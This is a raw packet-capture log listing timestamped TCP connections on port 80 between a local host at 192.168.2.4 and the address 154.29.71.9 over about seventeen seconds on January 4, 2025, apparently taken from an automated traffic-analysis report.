                                                                                                    Jan 4, 2025 14:52:50.065375090 CET8049780154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:50.176230907 CET4978080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:50.330246925 CET8049780154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:50.330285072 CET8049780154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:50.330378056 CET4978080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:50.458585024 CET4978080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:50.458894014 CET4978180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:50.463660002 CET8049780154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:50.463777065 CET8049781154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:50.463846922 CET4978080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:50.463886976 CET4978180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:50.463970900 CET4978180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:50.468847036 CET8049781154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:50.817687988 CET4978180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:50.822727919 CET8049781154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:50.822751045 CET8049781154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:50.822766066 CET8049781154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:51.137214899 CET8049781154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:51.191737890 CET4978180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:51.271933079 CET8049781154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:51.347228050 CET4978180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:51.396697044 CET4978180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:51.396975994 CET4978280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:51.401751995 CET8049781154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:51.401787043 CET8049782154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:51.401812077 CET4978180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:51.401864052 CET4978280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:51.401971102 CET4978280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:51.406747103 CET8049782154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:51.754359007 CET4978280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:51.759578943 CET8049782154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:51.759596109 CET8049782154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:51.759676933 CET8049782154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:51.911611080 CET4978380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:51.916588068 CET8049783154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:51.916716099 CET4978380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:51.916843891 CET4978380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:51.918051958 CET4978280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:51.922883034 CET8049783154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:51.923804045 CET8049782154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:51.923876047 CET4978280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:52.270006895 CET4978380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:52.275008917 CET8049783154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:52.275135994 CET8049783154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:52.346494913 CET4978480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:52.351547003 CET8049784154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:52.351646900 CET4978480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:52.351747036 CET4978480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:52.356626987 CET8049784154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:52.433855057 CET8049783154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:52.566845894 CET4978380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:52.572681904 CET8049783154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:52.676150084 CET4978380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:52.707581997 CET4978480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:52.712563038 CET8049784154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:52.712594986 CET8049784154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:52.712622881 CET8049784154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:52.869076014 CET8049784154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:52.988634109 CET4978480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:53.002388000 CET8049784154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:53.092915058 CET4978480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:53.126293898 CET4978380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:53.126295090 CET4978480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:53.126517057 CET4978580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:53.131464005 CET8049785154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:53.131499052 CET8049784154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:53.131583929 CET4978480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:53.131602049 CET4978580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:53.131720066 CET4978580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:53.131861925 CET8049783154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:53.134664059 CET4978380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:53.136559963 CET8049785154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:53.488770962 CET4978580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:53.493788004 CET8049785154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:53.493808031 CET8049785154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:53.493823051 CET8049785154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:53.757419109 CET8049785154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:53.877655029 CET4978580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:53.877938032 CET4978680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:53.882888079 CET8049786154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:53.883054972 CET8049785154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:53.883122921 CET4978580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:53.883140087 CET4978680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:53.883260965 CET4978680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:53.888103962 CET8049786154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:54.238763094 CET4978680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:54.243875980 CET8049786154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:54.243916035 CET8049786154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:54.243949890 CET8049786154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:54.536575079 CET8049786154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:54.670201063 CET8049786154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:54.670397997 CET4978680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:55.058192015 CET4978680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:55.058521986 CET4978780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:55.063463926 CET8049787154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:55.063528061 CET8049786154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:55.063529968 CET4978780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:55.063579082 CET4978680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:55.063715935 CET4978780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:55.068536997 CET8049787154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:55.410648108 CET4978780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:55.415672064 CET8049787154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:55.415708065 CET8049787154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:55.415736914 CET8049787154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:55.589378119 CET8049787154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:55.724050045 CET8049787154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:55.724103928 CET4978780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:55.847656012 CET4978880192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:55.852600098 CET8049788154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:55.852669001 CET4978880192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:55.852781057 CET4978880192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:55.857637882 CET8049788154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:56.207518101 CET4978880192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:56.212582111 CET8049788154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:56.212601900 CET8049788154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:56.212616920 CET8049788154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:56.388315916 CET8049788154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:56.521966934 CET8049788154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:56.524688005 CET4978880192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:56.643532038 CET4978980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:56.643589020 CET4978880192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:56.648471117 CET8049789154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:56.648559093 CET4978980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:56.648592949 CET8049788154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:56.648644924 CET4978880192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:56.648761034 CET4978980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:56.653532982 CET8049789154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:57.004374027 CET4978980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:57.009388924 CET8049789154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:57.009407997 CET8049789154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:57.009432077 CET8049789154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:57.166953087 CET8049789154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:57.285547018 CET4978980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:57.294301033 CET8049789154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:57.394912958 CET4978980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:57.586694002 CET4979080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:57.586752892 CET4978980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:57.591737032 CET8049790154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:57.591840029 CET4979080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:57.591888905 CET4979080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:57.591892004 CET8049789154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:57.591947079 CET4978980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:57.596702099 CET8049790154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:57.791153908 CET4979180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:57.791281939 CET4979080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:57.796041012 CET8049791154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:57.796122074 CET4979180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:57.796232939 CET4979180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:57.801043987 CET8049791154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:57.839437008 CET8049790154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:57.983896971 CET8049790154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:57.983961105 CET4979080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:58.145107985 CET4979180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:58.150142908 CET8049791154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:58.150177956 CET8049791154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:58.150206089 CET8049791154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:58.322021008 CET8049791154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:58.379268885 CET4979180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:58.452106953 CET8049791154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:58.567532063 CET4979180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:58.579775095 CET4979180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:58.580389023 CET4979280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:58.584882975 CET8049791154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:58.584934950 CET4979180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:58.585238934 CET8049792154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:58.585302114 CET4979280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:58.585405111 CET4979280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:58.590136051 CET8049792154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:58.943226099 CET4979280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:58.948259115 CET8049792154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:58.948280096 CET8049792154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:58.948292971 CET8049792154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:59.121826887 CET8049792154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:59.258086920 CET8049792154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:59.260713100 CET4979280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:59.473628998 CET4979380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:59.478570938 CET8049793154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:59.480300903 CET4979380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:59.480422974 CET4979380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:59.485223055 CET8049793154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:59.832882881 CET4979380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:59.838018894 CET8049793154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:59.838037014 CET8049793154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:59.838052988 CET8049793154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:59.998016119 CET8049793154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:00.126226902 CET8049793154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:00.126316071 CET4979380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:00.584342003 CET4979380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:00.584913015 CET4979580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:00.589428902 CET8049793154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:00.589488983 CET4979380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:00.589759111 CET8049795154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:00.589824915 CET4979580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:00.589939117 CET4979580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:00.594729900 CET8049795154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:00.942955017 CET4979580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:00.947972059 CET8049795154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:00.947990894 CET8049795154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:00.948004007 CET8049795154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:01.131340027 CET8049795154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:01.191785097 CET4979580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:01.263005018 CET8049795154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:01.381825924 CET4979580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:01.383059978 CET4979580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:01.383502007 CET4980180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:01.388041973 CET8049795154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:01.388101101 CET4979580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:01.388381004 CET8049801154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:01.388592958 CET4980180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:01.388685942 CET4980180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:01.393485069 CET8049801154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:01.738874912 CET4980180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:01.743743896 CET8049801154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:01.743820906 CET8049801154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:01.743870974 CET8049801154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:01.933495998 CET8049801154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:02.072170973 CET8049801154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:02.074778080 CET4980180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:02.193069935 CET4980180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:02.193398952 CET4980780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:02.198189020 CET8049801154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:02.198255062 CET8049807154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:02.198272943 CET4980180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:02.198343039 CET4980780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:02.198477983 CET4980780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:02.203422070 CET8049807154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:02.551393032 CET4980780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:02.556441069 CET8049807154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:02.556463003 CET8049807154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:02.556477070 CET8049807154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:02.736884117 CET8049807154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:02.802200079 CET4981380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:02.802469969 CET4980780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:02.807307959 CET8049813154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:02.807785034 CET8049807154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:02.807892084 CET4981380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:02.807918072 CET4980780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:02.807952881 CET4981380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:02.812849045 CET8049813154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:03.162440062 CET4981380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:03.167272091 CET8049813154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:03.167459011 CET8049813154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:03.312104940 CET4981480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:03.317075014 CET8049814154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:03.317136049 CET4981480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:03.317275047 CET4981480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:03.322046041 CET8049814154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:03.481686115 CET8049813154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:03.566781998 CET4981380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:03.610877037 CET8049813154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:03.676165104 CET4981380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:03.676393032 CET4981480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:03.681287050 CET8049814154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:03.681339979 CET8049814154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:03.681366920 CET8049814154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:03.911652088 CET8049814154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:03.973016977 CET4981480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:04.042299986 CET8049814154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:04.169528008 CET4981380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:04.169605017 CET4981480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:04.170161009 CET4982180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:04.174566984 CET8049813154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:04.174626112 CET4981380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:04.174968958 CET8049814154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:04.175021887 CET4981480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:04.175025940 CET8049821154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:04.175276041 CET4982180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:04.175373077 CET4982180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:04.180140018 CET8049821154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:04.520190001 CET4982180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:04.525333881 CET8049821154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:04.525374889 CET8049821154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:04.525407076 CET8049821154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:04.699496984 CET8049821154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:04.826222897 CET8049821154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:04.826307058 CET4982180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:04.955472946 CET4982780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:04.955545902 CET4982180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:04.960303068 CET8049827154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:04.960372925 CET4982780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:04.960597038 CET4982780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:04.960613012 CET8049821154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:04.960711956 CET4982180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:04.965430021 CET8049827154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:05.316893101 CET4982780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:05.321930885 CET8049827154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:05.321948051 CET8049827154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:05.321959972 CET8049827154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:05.505991936 CET8049827154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:05.598093987 CET4982780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:05.640557051 CET8049827154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:05.785545111 CET4982780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:06.051623106 CET4982780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:06.052895069 CET4983780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:06.056659937 CET8049827154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:06.056756973 CET4982780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:06.057681084 CET8049837154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:06.057743073 CET4983780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:06.057854891 CET4983780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:06.062654018 CET8049837154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:06.410618067 CET4983780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:06.415565014 CET8049837154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:06.415606022 CET8049837154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:06.415633917 CET8049837154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:06.744714022 CET8049837154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:06.785551071 CET4983780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:06.878379107 CET8049837154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:07.010242939 CET4983780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:07.010500908 CET4984380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:07.015420914 CET8049837154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:07.015475988 CET8049843154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:07.015532970 CET4983780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:07.015572071 CET4984380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:07.015685081 CET4984380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:07.020493031 CET8049843154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:07.365376949 CET4984380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:53:07.370508909 CET8049843154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:07.370548964 CET8049843154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:53:07.370578051 CET8049843154.29.71.9192.168.2.4
